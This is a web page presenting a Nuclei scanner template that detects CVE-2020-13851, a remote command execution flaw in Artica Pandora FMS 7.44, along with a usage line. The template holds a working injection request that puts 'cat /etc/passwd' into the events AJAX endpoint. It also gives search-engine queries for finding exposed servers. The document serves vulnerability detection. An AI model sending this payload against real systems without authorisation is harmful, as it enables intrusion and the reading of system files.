Skip to content

Artica Pandora FMS 7.44 - Remote Code Execution

ID: CVE-2020-13851

Severity: high

Author: theamanrawat

Tags: cve2020,cve,packetstorm,rce,pandora,unauth,artica,pandorafms

Artica Pandora FMS 7.44 allows remote command execution via the events feature.

id: CVE-2020-13851
info:
name: Artica Pandora FMS 7.44 - Remote Code Execution
author: theamanrawat
severity: high
description: |
Artica Pandora FMS 7.44 allows remote command execution via the events feature.
reference:
- https://packetstormsecurity.com/files/158390/Pandora-FMS-7.0-NG-7XX-Remote-Command-Execution.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-13851
- https://www.coresecurity.com/advisories
- https://github.com/hadrian3689/pandorafms_7.44
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2020-13851
cwe-id: CWE-78
epss-score: 0.96994
epss-percentile: 0.99737
cpe: cpe:2.3:a:pandorafms:pandora_fms:7.44:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: pandorafms
product: pandora_fms
shodan-query:
- title:"Pandora FMS"
- http.title:"pandora fms"
fofa-query: title="pandora fms"
google-query: intitle:"pandora fms"
tags: cve2020,cve,packetstorm,rce,pandora,unauth,artica,pandorafms
http:
- raw:
- |
POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'root:.*:0:0:'
- type: word
part: header
words:
- "text/html"
- "PHPSESSID="
condition: and
- type: status
status:
- 200
# digest: 490a0046304402201541743913dd306003a8b3cabafdecca46e944eb4aa1eb05b96ada8931b9732e02201c2e2cf41dce00212ae500ed5e595759ff78e34a343a5dddbb88289ee5dfd5e0:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-13851.yaml"

View on Github